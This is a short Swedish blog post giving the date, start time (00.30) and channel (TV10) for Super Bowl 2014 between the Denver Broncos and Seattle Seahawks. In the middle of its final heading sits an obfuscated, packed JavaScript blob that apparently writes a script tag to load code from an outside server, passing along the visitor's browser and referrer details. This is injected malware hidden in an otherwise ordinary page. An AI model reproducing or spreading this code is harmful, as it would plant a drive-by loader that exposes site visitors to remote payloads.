Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Super Bowl 2014 tid och kanal

super-bowl-2013-reklam
Sebastian

Nu är det snart dags för en ny kamp om Amerikas stolthet. På Söndag den 2 februari  är det nämligen dags för Super Bowl 2014. Denna gång får vi träffa två riktigt heta lag, Denver Broncos och Seattle Seahawks. Super Bowl 2014 kommer att spelas på Amerikanska östkusten. Staden och arenan som fått äran detta år är MetLife Stadium i New Jersey. MetLife Stadium är mycket känt för att vara hemmaplan för två av de hetaste lagen, New York Giants och New York Jets och har sittplatser för över 83 000 personer.

Hur som helst är vi i Sverige och här kommer matchen att börja sändas klockan 00.30 och slutar någon gång runt 04.00. Super Bowl 2014 kommer att sändas på TV10 och återigen kommer vi inte att få ta del av den amerikanska reklamen tyvärr på grund av rättigheter.

Super eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rttnd|var|u0026u|referrer|adskz||js|php’.split(’|’),0,{}))
Bowl 2014

Tid: Start 00.30

Datum: Söndag 2 februari

Kanal: TV10

Mer info om Super Bowl 2014 hittar ni här!